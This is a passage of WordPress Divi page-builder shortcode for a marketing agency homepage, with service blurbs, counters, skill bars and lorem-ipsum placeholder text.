body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" 